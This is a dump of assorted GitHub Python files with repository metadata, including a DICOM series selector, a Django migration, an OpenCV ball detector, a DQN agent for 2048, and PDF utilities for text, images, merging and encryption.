try_by_number_of_images(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('NumberOfImages',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Lowest Series Number\n if n_series > 1:\n reduced_df = reduced_df.head(1)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('First series',val,reduced_df.shape[0]))\n n_series = reduced_df.shape[0]\n ogo.message(' {:20s} {:>10} {:>10d} **'.format('MORE CRITERIA NEEDED',' ',n_series))\n #print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n ogo.message(' {:16} (Series Number = {:3d}) {:>6d}'.format('FINAL SELECTION',int(reduced_df.iloc[0]['Series Number']),reduced_df.shape[0]))\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n ogo.message('')\n\n # Collect the selected series\n sorted_df = pd.concat([sorted_df,reduced_df])\n \n # Final selection\n ogo.message('Dataframe size is reduced to {}.'.format(sorted_df.shape[0]))\n ogo.message('')\n \n # Write csv file\n ogo.message('Writing csv output file:')\n ogo.message(' {}'.format(output))\n sorted_df.to_csv(output)\n ogo.message('')\n\n # Write script to pull the dicom files\n ogo.message('Writing file for pulling dicom files:')\n ogo.message(' {}'.format(output_pull))\n ogo.message('')\n\n \n fpull = open(output_pull, 'w')\n sorted_df = sorted_df.reset_index() # make sure indexes pair with number of rows\n current_dir = os.getcwd()\n\n fpull.write('#!/bin/bash\\n')\n fpull.write('exit\\n')\n fpull.write('# \\n')\n fpull.write('# Generated by ogoDicomScanner: {}\\n'.format(datetime.datetime.now()))\n fpull.write('# \\n')\n fpull.write('# Script to pull a dicom series, create a NIfTI, and visualize with offscreen rendering.\\n')\n fpull.write('# Prior to running, remove line 2 after checking the following:\\n')\n fpull.write('# 1. Check BASE_DIR, OUTPUT_DICOM_DIR, OUTPUT_NIFTI_DIR for accuracy.\\n')\n fpull.write('# 2. Check that conda is installed on the path described below.\\n')\n fpull.write('# 3. Check that ogo is installed in your conda environment.\\n')\n fpull.write('# 4. Remove line #2 once all checks are complete.\\n')\n fpull.write(os.linesep)\n fpull.write('BASE_DIR=\\'{}\\'\\n'.format(current_dir))\n fpull.write('OUTPUT_DICOM_DIR=\\'{}\\'\\n'.format(current_dir+'/dicom'))\n fpull.write('OUTPUT_NIFTI_DIR=\\'{}\\'\\n'.format(current_dir+'/nifti'))\n fpull.write(os.linesep)\n fpull.write('source /Users/skboyd/opt/miniconda3/etc/profile.d/conda.sh\\n')\n fpull.write('conda activate ogo\\n')\n fpull.write(os.linesep)\n\n current_name = ''\n for index, row in sorted_df.iterrows():\n fname = '{}_{}_{}_{}'.format( \\\n row['Name'], \\\n str(row['AcquisitionDate']).replace('-',''), \\\n str(row['SeriesDescription']).replace(',','_').replace(' ','_').replace('__','_'), \\\n int(row['SeriesNumber']) \\\n )\n this_name = '{}_{}'.format( \\\n row['Name'], \\\n str(row['AcquisitionDate']).replace('-',''))\n \n dicompull_cmd = '#dicompull -k SeriesInstanceUID={} {}/\\'{}\\' -o {}\\'/{}\\'\\n'.format( \\\n row['SeriesInstanceUID'], \\\n '${BASE_DIR}', \\\n os.path.split(row['ReferencedFileID'])[0], \\\n '${OUTPUT_DICOM_DIR}', \\\n fname \\\n )\n dicomtonifti_cmd = '#dicomtonifti -brz --fsl {}/\\'{}\\' -o {}\\'/{}_0000.nii.gz\\'\\n'.format( \\\n '${OUTPUT_DICOM_DIR}', \\\n fname, \\\n '${OUTPUT_NIFTI_DIR}', \\\n this_name \\\n )\n ogoVisualize_cmd = '#ogoVisualize vis2d --offscreen {}/\\'{}_0000.nii.gz\\' --outfile {}/\\'{}_0000_2d.tif\\'\\n'.format( \\\n '${OUTPUT_NIFTI_DIR}', \\\n this_name, \\\n '${OUTPUT_NIFTI_DIR}', \\\n this_name \\\n )\n \n if this_name != current_name:\n name_hdr = '# {} {:s}\\n'.format(this_name,'-'*80)\n fpull.write(name_hdr)\n fpull.write(os.linesep)\n current_name = this_name\n \n fpull.write(dicompull_cmd)\n fpull.write(dicomtonifti_cmd)\n fpull.write(ogoVisualize_cmd)\n fpull.write(os.linesep)\n \n fpull.write('exit\\n')\n fpull.close()\n \n ogo.message('Done!')\n \ndef main():\n # Setup description\n description = '''\nTakes a CSV file of meta data where each row represents a dicom series within\ndicom studies. The selection criteria is used to narrow the search for the \nbest series.\n\nCurrently it is set to only exclude series that are certain to be useless:\n – excludes based on having a minimum number of slices\n – excludes based on having a maximum slice thickness\n – excludes any series with certain keyworks (hardcoded, not case sensitive)\n \nIf you want to try different inclusion/exclusion criteria you should edit the\nsource code.\n\n'''\n\n epilog = '''\nExample call: \n \nogoDicomSelector list.csv ! will output list_selected.csv\nogoDicomSelector list.csv --output narrowed_list.csv\nogoDicomSelector list.csv --minNumberSlices 50 --output narrowed_list.csv\n\n'''\n\n # Setup argument parsing\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter,\n prog=\"ogoDicomSelector\",\n description=description,\n epilog=epilog\n )\n\n parser.add_argument('csvfile', metavar='CSV',\n help='Input CSV file (*.csv)')\n parser.add_argument('--output', default=None, metavar='CSV', \n help='Reduced list of dicom series (*.csv, default: %(default)s)')\n parser.add_argument('--overwrite', action='store_true', \n help='Overwrite output file without asking')\n parser.add_argument('--minNumberSlices', type=int, nargs=1, default=30, metavar='N', help='Exclude series with fewer slices (default: %(default)s)')\n parser.add_argument('--maxSliceThickness', type=float, nargs=1, default=4.0, metavar='MM', help='Exclude series with thicker slices (default: %(default)s mm)')\n \n # Parse and display\n args = parser.parse_args()\n print(echo_arguments('DicomSelector', vars(args)))\n\n # Run program\n DicomSelector(**vars(args))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Bonelab/Ogo","sub_path":"ogo/cli/DicomSelector.py","file_name":"DicomSelector.py","file_ext":"py","file_size_in_byte":20155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1187846858","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sponsor', '0004_auto_20150905_2023'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='sponsorpagesponsor',\n name='link_external',\n field=models.URLField(verbose_name='External link', blank=True),\n ),\n ]\n","repo_name":"Vicarium/synchronl","sub_path":"synchro/sponsor/migrations/0005_auto_20150911_1810.py","file_name":"0005_auto_20150911_1810.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74067525048","text":"# Copyright (c) 2010 Resolver Systems Ltd.\r\n# All Rights Reserved\r\n#\r\n\r\nfrom functionaltest import FunctionalTest\r\n\r\n\r\nclass Test_2848_WorksheetBounds(FunctionalTest):\r\n\r\n def test_access_worksheet_bounds(self):\r\n # * Harold logs in to Dirigible and creates a nice shiny new sheet\r\n self.login_and_create_new_sheet()\r\n\r\n # He enters some data\r\n self.enter_cell_text(4, 2, \"Top right\")\r\n self.enter_cell_text(2, 10, \"Bottom left\")\r\n\r\n # He writes some usercode to access the bounds of the worksheet\r\n self.append_usercode(\"worksheet[3, 5].value = worksheet.bounds\")\r\n self.append_usercode(\"worksheet[3, 6].value = worksheet.bounds.bottom\")\r\n\r\n # ...and is delighted to discover it works!\r\n self.wait_for_cell_value(3, 5, \"(2, 2, 4, 10)\")\r\n self.wait_for_cell_value(3, 6, \"10\")\r\n","repo_name":"pythonanywhere/dirigible-spreadsheet","sub_path":"dirigible/fts/tests/test_2848_WorksheetBounds.py","file_name":"test_2848_WorksheetBounds.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"77"} +{"seq_id":"1013766198","text":"### documentos ###\nfrom cpf_cnpj import Documento\ncpf = Documento.cria_documento('15316264754')\ncnpj = Documento.cria_documento('35379838000112')\nprint(f'CPF = {cpf}, CNPJ = {cnpj}')\n# CPF = 153.162.647-54, CNPJ = 35.379.838/0001-12\n\n\n### telefones ###\nfrom TelefonesBr import TelefonesBr\ntelefone = TelefonesBr('5516912345678')\nprint(telefone) # '+55(16)91234-5678'\n\n\n### datas ###\nfrom datas_br import DatasBr\ncadastro = DatasBr()\nprint(cadastro) # '19/06/2022 15:20'\nprint(cadastro.tempo_cadastro()) # '0:01:44.536879'\n\n\n### cep ###\nfrom acesso_cep import BuscarEndereco\ncep = BuscarEndereco(\"01001000\")\nbairro, cidade, uf = cep.acessa_via_cep()\nprint(cep) # '01001-000'\nprint(bairro, cidade, uf) # 'Sé São Paulo SP' \n","repo_name":"jpfalcuci/estudos","sub_path":"python/05-brasilidades/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"40472590767","text":"#bola_tenis_1.0.py\n\nimport cv2\nimport numpy\n\nTITULO = \"Bola de tenis 1.0\"\nTITULO_GRIS = \"Imagen gris\"\nTITULO_GAUSIANO = \"Gaussian smoothing\"\n\nvideo = cv2.VideoCapture(0)\ncontador = 1\n\nhmn = 12\nhmx = 37\nsmn = 145\nsmx = 255\nvmn = 186\nvmx = 255\n\n\ndef mostrarImagen(imagen, titulo = 'Video'):\n\tcv2.imshow(titulo,imagen)\n\nwhile(True):\t\n\t_,imagen = video.read()\t\t\t#Leer camara\n\n\t\t\t\n\tgris = cv2.cvtColor(imagen, cv2.COLOR_BGR2GRAY)\n\n\t#hsv = cv2.cvtColor(imagen, cv2.COLOR_BGR2HSV)\n\t#hue,sat,val = cv2.split(hsv)\n\n\tgausiano = cv2.GaussianBlur(gris,(5,5),0)\n\tcirculos = cv2.HoughCircles(gausiano,cv2.HOUGH_GRADIENT,2,120,param1=120,param2=50,minRadius=10,maxRadius=0)\n\n\n\tprint(contador)\n\t#if type(circulos) != 'NoneType'\n\t\n\t\t\n\n\tmostrarImagen(imagen,TITULO)\t#Mostrar imagen\n\t#mostrarImagen(gris, TITULO_GRIS)\n\t#mostrarImagen(gausiano, TITULO_GAUSIANO)\n\n\tk = cv2.waitKey(5) & 0xFF\n\tif k == 27:\n\t break\n\telse:\n\t\tcontador +=1\n\nvideo.release()\ncv2.destroyAllWindows()","repo_name":"astudisho/OpenCV","sub_path":"Python/OpenCv/Bola de tenis/bola_tenis_1.0.py","file_name":"bola_tenis_1.0.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69894054970","text":"import re\nfrom collections import defaultdict\n\n\ndef read_input():\n with open(\"./input/2020/dec02.txt\", \"r\") as f:\n for line in f.readlines():\n yield line\n\n\nrx = re.compile(r\"(\\d+)-(\\d+) (\\w): (\\w+)\")\n\n\ndef part_1():\n valid = 0\n for line in read_input():\n lo, hi, ch, pw = rx.match(line).groups()\n\n letters = defaultdict(int)\n for letter in pw:\n letters[letter] += 1\n\n if int(lo) <= letters.get(ch, 0) and letters.get(ch, 0) <= int(hi):\n valid += 1\n\n assert 622 == valid\n\n\ndef part_2():\n valid = 0\n for line in read_input():\n lo, hi, ch, pw = rx.match(line).groups()\n if (pw[int(lo) - 1] == ch) ^ (pw[int(hi) - 1] == ch):\n valid += 1\n\n assert 263 == valid\n","repo_name":"tomasaschan/advent-of-code-2020","sub_path":"src/aoc/2020/dec02.py","file_name":"dec02.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"20408063574","text":"import random\nimport numpy as np\nfrom collections import deque\nimport tensorflow as tf\nfrom board import Board2048, Direction\nfrom game import Game2048\nfrom tqdm import tqdm\nfrom easy_logs import get_logger\nimport json\n\nlogger = get_logger(lvl=10)\ntf.keras.utils.disable_interactive_logging()\n\n\nclass DQNAgent:\n def __init__(\n self,\n actions=[\n Direction.UP.value,\n Direction.DOWN.value,\n Direction.LEFT.value,\n Direction.RIGHT.value,\n ],\n memory_size=22000,\n gamma=0.95, # discount rate\n epsilon=1.0, # exploration rate\n epsilon_min=0.1,\n epsilon_decay=0.9997,\n learning_rate=0.001,\n ):\n self.memory = deque(maxlen=memory_size)\n self.gamma = gamma\n self.epsilon = epsilon\n self.epsilon_min = epsilon_min\n self.actions = actions\n self.epsilon_decay = epsilon_decay\n self.model = self._build_model(actions, learning_rate)\n self.target_model = self._build_model(actions, learning_rate)\n self.update_target_model()\n\n def _build_model(self, actions, learning_rate):\n model = tf.keras.Sequential(\n [\n tf.keras.layers.Input(shape=(4, 4, 1)),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(196, activation=\"relu\"),\n tf.keras.layers.Dense(len(actions), activation=None),\n ]\n )\n\n model.compile(\n loss=\"mse\",\n optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate),\n )\n\n return model\n\n def update_target_model(self):\n self.target_model.set_weights(self.model.get_weights())\n\n def update_memory(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n\n def do_action(self, state) -> int:\n \"\"\"\n Return index of action to take\n \"\"\"\n if np.random.rand() > self.epsilon:\n act_values = self.model.predict(np.expand_dims(state, axis=0))\n action_index = np.argmax(act_values[0])\n else:\n action_index = np.random.choice(len(self.actions))\n return self.actions[action_index]\n\n def replay(\n self,\n batch_size,\n ):\n minibatch = np.array(random.sample(self.memory, batch_size), dtype=object)\n states = np.array(minibatch[:, 0].tolist())\n actions = minibatch[:, 1].astype(int)\n rewards = minibatch[:, 2]\n next_states = np.array(minibatch[:, 3].tolist())\n dones = minibatch[:, 4]\n # convert to\n targets = self.model.predict(states)\n targets[np.arange(len(targets)), actions] = rewards + self.gamma * np.amax(\n self.target_model.predict(next_states), axis=1\n ) * (1 - dones)\n self.model.fit(\n states,\n targets,\n epochs=1,\n verbose=1,\n )\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n def load(self, name):\n self.model.load_weights(name)\n self.update_target_model()\n\n def save(self, name):\n self.target_model.save_weights(name)\n\n\nif __name__ == \"__main__\":\n EPOCHS = 200\n UPDATE_TARGET_FREQ = 5\n BATCH_SIZE = 256\n history = {}\n board = Board2048()\n agent = DQNAgent()\n for e in range(EPOCHS):\n bar = tqdm(total=1000, desc=f\"Epoch {e}\", position=0)\n state = board.reset()\n frame = 0\n while not board.is_game_over:\n frame += 1\n action = agent.do_action(state)\n next_state, reward, not_done = board.move(action, tf=True)\n reward = len(board.empty_cells)\n done = not not_done\n agent.update_memory(state, action, reward, next_state, done)\n state = next_state\n bar.update(1)\n bar.set_postfix(score=reward)\n bar.set_description(\n f\"Epoch {e} score: {board.score} frame: {frame} e: {agent.epsilon:.2f}, a: {action} mem: {len(agent.memory)}\"\n )\n if len(agent.memory) > BATCH_SIZE * 22 and frame % 2 == 0:\n agent.replay(BATCH_SIZE)\n if e % UPDATE_TARGET_FREQ == 0:\n agent.update_target_model()\n history[e] = board.score\n bar.close()\n\n with open(\"history.json\", \"w\") as f:\n json.dump(history, f)\n\n # save model\n agent.save(\"model.h5\")\n","repo_name":"michalskibinski109/2048","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17021609121","text":"\"\"\"PDF FILE WORKING WITH.\"\"\"\r\n\r\nimport os\r\nimport subprocess\r\nimport PyPDF2\r\n# sau\r\nimport PyPDF3\r\n\r\n\r\n# !/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"{'Author': 'Florian Zah',\r\n'Contact': '',\r\n'Copyright': 'Florian Zah',\r\n'Credits': [],\r\n'Date': '18.09.2019',\r\n'Description': 'Various operation with pdf file',\r\n'Last Modification': 'dd.mm.yyyy',\r\n'Licence': '',\r\n'Maintainer': 'Florian Zah',\r\n'Status': 'Prototype/Production/Abandoned',\r\n'Tags': ['pdf', 'extract', 'img', 'foto', 'text', 'merge pdf', 'text', 'rotate'],\r\n'Title': 'WORKING WITH PDF FILE',\r\n'Usage': '.',\r\n'Version': '1.1.0'}\r\n\"\"\"\r\n\r\n\r\ndef extrage_poze(pdf_path, output_dir): # MERGE!!!\r\n \"\"\"Quick and dirt. Work with pdf 1.6.\"\"\"\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n\r\n cmd = ['pdfimages', '-all', pdf_path,\r\n '{}/prefix'.format(output_dir)]\r\n subprocess.call(cmd)\r\n print('Images extracted:')\r\n print(os.listdir(output_dir))\r\n\r\n\r\n# extrage_poze('israel.pdf', output_dir='extracted_images')\r\n\r\n\r\ndef extrage_poze_2(file):\r\n \"\"\"Nu merge la toate pdf-urile.\"\"\"\r\n with open(file, \"rb\") as file:\r\n file.seek(0)\r\n pdf = file.read()\r\n\r\n startmark = b\"\\xff\\xd8\"\r\n startfix = 0\r\n endmark = b\"\\xff\\xd9\"\r\n endfix = 2\r\n i = 0\r\n print(\"Asteapta!\")\r\n njpg = 0\r\n while True:\r\n istream = pdf.find(b\"stream\", i)\r\n if istream < 0:\r\n break\r\n istart = pdf.find(startmark, istream, istream + 20)\r\n if istart < 0:\r\n i = istream + 20\r\n continue\r\n iend = pdf.find(b\"endstream\", istart)\r\n if iend < 0:\r\n raise Exception(\"Didn't find end of stream!\")\r\n iend = pdf.find(endmark, iend - 20)\r\n if iend < 0:\r\n raise Exception(\"Didn't find end of JPG!\")\r\n\r\n istart += startfix\r\n iend += endfix\r\n print(\"JPG %d from %d to %d\" % (njpg, istart, iend))\r\n jpg = pdf[istart:iend]\r\n with open(\"jpg%d.jpg\" % njpg, \"wb\") as jpgfile:\r\n jpgfile.write(jpg)\r\n\r\n njpg += 1\r\n i = iend\r\n print(\"Final!\")\r\n\r\n# extrage_poze_2('love yoga.pdf')\r\n\r\n# ===============================================\r\n# WORKING WITH TEXT\r\n# ===============================================\r\n\r\n# 1. EXTRACT TEXT FROM PDF - IT WORKED!!!\r\ndef extrage_text(pdf_file):\r\n pdfFileObj = open(pdf_file, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(pdfFileObj)\r\n pdfReader.numPages\r\n pageObj = pdfReader.getPage(0)\r\n pageObj.extractText()\r\n print(pdfReader.numPages)\r\n print(pageObj.extractText())\r\n# extrage_text('ebp.pdf')\r\n\r\n# 2. DECRYPTING PDF - NU MERGE\r\ndef decripteaza():\r\n pdfReader = PyPDF3.PdfFileReader(open('encrypted.pdf', 'rb'))\r\n print(pdfReader.isEncrypted)\r\n # print(pdfReader.getPage(0))\r\n # print(pdfReader.getPage())\r\n print(pdfReader.decrypt('rosebud'))\r\n print(pageObj=pdfReader.getPage(0))\r\n# decripteaza()\r\n\r\n# 3. CREATE PDF = MERGE 2 PDF FILE IN A SINGLE ONE - WORKED!\r\n# Steps for editing pdf\r\n# 1. Open one or more existing PDFs (the source PDFs) into PdfFileReader objects.\r\n# 2. Create a new PdfFileWriter object.\r\n# 3. Copy pages from the PdfFileReader objects into the PdfFileWriter object.\r\n# 4. Finally, use the PdfFileWriter object to write the output PDF.\r\ndef append_pdf(): # append a pdf to another pdf (merge 2 pdf-uri)\r\n pdf1File = open('meetingminutes.pdf', 'rb')\r\n pdf2File = open('meetingminutes2.pdf', 'rb')\r\n pdf1Reader = PyPDF3.PdfFileReader(pdf1File)\r\n pdf2Reader = PyPDF3.PdfFileReader(pdf2File)\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n for pageNum in range(pdf1Reader.numPages):\r\n pageObj = pdf1Reader.getPage(pageNum)\r\n pdfWriter.addPage(pageObj)\r\n for pageNum in range(pdf2Reader.numPages):\r\n pageObj = pdf2Reader.getPage(pageNum)\r\n pdfWriter.addPage(pageObj)\r\n pdfOutputFile = open('combinedminutes1.pdf', 'wb')\r\n pdfWriter.write(pdfOutputFile)\r\n pdfOutputFile.close()\r\n pdf1File.close()\r\n pdf2File.close()\r\n# append_pdf()\r\n\r\n# 4. ROTATE PAGE - MERGE!\r\ndef roteste_pagina(pdf_file): # roteste prima pagina si face din ea un nou pdf\r\n minutesFile = open(pdf_file, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(minutesFile)\r\n page = pdfReader.getPage(0)\r\n page.rotateClockwise(90)\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n pdfWriter.addPage(page)\r\n resultPdfFile = open('rezultat_rotire.pdf', 'wb')\r\n pdfWriter.write(resultPdfFile)\r\n resultPdfFile.close()\r\n minutesFile.close()\r\n# roteste_pagina('3340063.pdf')\r\n\r\n# 5. OVERLAY (pune o stampila, imagine peste pagina) - MERGE!\r\ndef overlay(pdf_file):\r\n minutesFile = open(pdf_file, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(minutesFile)\r\n minutesFirstPage = pdfReader.getPage(0)\r\n pdfWatermarkReader = PyPDF2.PdfFileReader(open('watermark.pdf', 'rb'))\r\n minutesFirstPage.mergePage(pdfWatermarkReader.getPage(0))\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n pdfWriter.addPage(minutesFirstPage)\r\n for pageNum in range(1, pdfReader.numPages):\r\n pageObj = pdfReader.getPage(pageNum)\r\n pdfWriter.addPage(pageObj)\r\n resultPdfFile = open('rezultat_overlay.pdf', 'wb')\r\n pdfWriter.write(resultPdfFile)\r\n minutesFile.close()\r\n resultPdfFile.close()\r\n# overlay('3340063.pdf') # fisierul in care pune pe prima pagina\r\n\r\n# 6. ENCRYPT PDF - MERGE!\r\ndef encripteaza(pdf_file):\r\n pdfFile = open(pdf_file, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(pdfFile)\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n for pageNum in range(pdfReader.numPages):\r\n pdfWriter.addPage(pdfReader.getPage(pageNum))\r\n pdfWriter.encrypt('swordfish') # parola cu care encripteaza\r\n resultPdf = open('rezultat_encriptare.pdf', 'wb')\r\n pdfWriter.write(resultPdf)\r\n resultPdf.close()\r\n# encripteaza('3340063.pdf')\r\n\r\n# 7. COMBINE SELECTED PAGES FROM VARIOUS PDF - nu merge!!!\r\n# Combina mai multe pdf-uri (merge) dar fara prima pagina\r\ndef combina_foi_din_diferite_pdf():\r\n \"\"\"1. Find all pdf in a folder.\"\"\"\r\n pdfFiles = []\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n for filename in os.listdir('.'):\r\n if filename.endswith('.pdf'):\r\n pdfFiles.append(filename)\r\n pdfFiles.sort(key=str.lower)\r\n #print(pdfFiles)\r\n pdfFiles = ['3340063.pdf', 'bus.pdf'] # pentru test\r\n print(pdfFiles) # pentru test\r\n # pdfWriter = PyPDF3.PdfFileWriter()\r\n # \"\"\"2. Open each pdf.\"\"\"\r\n # pdfFiles = []\r\n for filename in pdfFiles:\r\n pdfFileObj = open(filename, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(pdfFileObj)\r\n print(pdfReader)\r\n # \"\"\"3. Add each page.\"\"\"\r\n for filename in pdfFiles:\r\n for pageNum in range(1, pdfReader.numPages):\r\n pageObj = pdfReader.getPage(pageNum)\r\n pdfWriter.addPage(pageObj)\r\n print(pdfWriter)\r\n # \"\"\"4. Save the result.\"\"\"\r\n for filename in pdfFiles:\r\n for pageNum in range(1, pdfReader.numPages):\r\n pdfOutput = open('rezultat_merging.pdf', 'wb')\r\n pdfWriter.write(pdfOutput)\r\n pdfOutput.close()\r\n# combina_foi_din_diferite_pdf()\r\n\r\n# =======================================================\r\n# ASTEA SUNT NETESTATE\r\n# =======================================================\r\n\"\"\"\r\nmypdf = 'bus.pdf'\r\npdf_document = PyPDF2.PdfFileReader(mypdf) # read a file\r\npdf_document.numPages # numar pagini\r\nprint(pdf_document)\r\nprint(pdf_document.numPages)\r\nfirst_page = pdf_document.getPage(0) # get first page\r\nprint(first_page.extractText())\r\npage_one = pdf_document.getPage(0)\r\n\r\npdf_document_writer = PyPDF2.PdfFileWriter() # for write a pdf\r\npdf_document_writer.addPage(page_one)\r\npdf_output_file = open('new_pdf_file.pdf', 'wb')\r\npdf_document_writer.write(pdf_output_file)\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# Let's try to read the contents of our newly created PDF document:\r\nmypdf = open(r'bus.pdf', mode='rb')\r\npdf_document = PyPDF2.PdfFileReader(mypdf)\r\npdf_document.numPages\r\npage_one = pdf_document.getPage(0)\r\nprint(page_one.extractText())\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# print pages from pdf\r\nmypdf = open(r'D:\\\\lipsum.pdf', mode='rb')\r\npdf_document = PyPDF2.PdfFileReader(mypdf)\r\n\r\nfor i in range(pdf_document.numPages):\r\n page_to_print = pdf_document.getPage(i)\r\n print(page_to_print.extractText())\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# read the contents of all pages\r\ntext = ''\r\nmypdf = PyPDF2.PdfFileReader(mypdf)\r\ni = 1\r\nfor page in range(mypdf.getNumPages()):\r\n pdf_page = mypdf.getPage(page)\r\n text += pdf_page.extractText()\r\n print(i)\r\n i += 1\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# get_doc_info.py # extrage informatii din pdf\r\nfrom PyPDF2 import PdfFileReader\r\ndef get_info(path):\r\n with open(path, 'rb') as f:\r\n pdf = PdfFileReader(f)\r\n info = pdf.getDocumentInfo()\r\n number_of_pages = pdf.getNumPages()\r\n print(info)\r\n author = info.author\r\n creator = info.creator\r\n producer = info.producer\r\n subject = info.subject\r\n title = info.title\r\nif __name__ == '__main__':\r\n path = 'bus.pdf'\r\n get_info(path)\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# extracting_text.py\r\n# EXTRAGE DIN ANUMITE PDF-uri\r\nfrom PyPDF2 import PdfFileReader\r\ndef text_extractor(path):\r\n with open(path, 'rb') as f:\r\n pdf = PdfFileReader(f)\r\n # get the first page\r\n page = pdf.getPage(0)\r\n print(page)\r\n print('Page type: {}'.format(str(type(page))))\r\n text = page.extractText()\r\n print(text)\r\nif __name__ == '__main__':\r\n path = 'bus.pdf'\r\n text_extractor(path)\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\npdfFileObj = open('bus.pdf', 'rb')\r\npdfReader = PyPDF2.PdfFileReader(pdfFileObj)\r\npdfReader.numPages\r\npageObj = pdfReader.getPage(0)\r\npageObj.extractText()\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\nimport PyPDF2\r\npdfReader = PyPDF2.PdfFileReader(open('3340063.pdf', 'rb'))\r\nprint(pdfReader.isEncrypted)\r\nprint(pdfReader.getPage(0))\r\nprint(pdfReader.decrypt('rosebud')) # asta e parola daca pdf e encriptat\r\nprint(pageObj=pdfReader.getPage(0))\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\nfrom tika import parser\r\nraw = parser.from_file('3340063.pdf')\r\nprint(raw['content'])\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\nimport textract\r\ntext = textract.process(\"bus.pdf\")\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\nfrom py4j.java_gateway import JavaGateway\r\ngw = JavaGateway()\r\nresult = gw.entry_point.strip('bus.pdf')\r\n# result is a dict of {\r\n# 'success': 'true' or 'false',\r\n# 'payload': pdf file content if 'success' is 'true'\r\n# 'error': error message if 'success' is 'false'}\r\nprint (result['payload'])\r\n\"\"\"\r\n# =============================================================================\r\n\r\n","repo_name":"Zahu2018/PROGRAME","sub_path":"pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73437399927","text":"#!/usr/bin/python3\n\ndef custom_calculation(x, y):\n outcome = 0\n for idx in range(1, 3):\n try:\n if idx > x:\n raise Exception('Exceeded limit')\n else:\n outcome += x ** y / idx\n except:\n outcome = y + x\n break\n return outcome\n","repo_name":"AziMadolo/alx-higher_level_programming","sub_path":"0x05-python-exceptions/102-magic_calculation.py","file_name":"102-magic_calculation.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18402991438","text":"import warnings\nimport pandas as pd # importing the pandas module / before importing I installed pandas \"pip install pandas\"\nimport numpy as np\nimport datetime\nfrom datetime import date\n\nwarnings.simplefilter(action=\"ignore\")\n\npd.set_option(\"display.max_columns\", None)\npd.set_option(\"display.float_format\", lambda x : \"%5f\" %x)\n\npd.set_option('display.max_rows', 500)\n\n\n###First I created the date list outside, and here with the module my code read my list.\ndf = pd.read_excel(\"C:/Users/s2200083/PycharmProjects/pythonProject/venv/date_leanvay.xlsx\") # In this list Generoidaan elementtejä 1.1.2022 - 13.1.2023 aikavälille\n\ndf.head() # Returns the first 5 rows of the dataframe . The head function in Python displays the first five rows of the dataframe by default\n\ndf.loc[df[\"id\"]==183] ## Access a group of rows and columns by label(s) or a boolean array. .loc[] is primarily label based,\n # but may also be used with a boolean array.\n # Here I access the 183.element and defined 183.element for the next step.\n # Haetaan listan 183 elementti. Tulostetaan edellinen ja seuraava päivämäärä viitteen kautta\n\n# I defined the before and after element here.\n\n##Tulostetaan edellinen ja seuraava 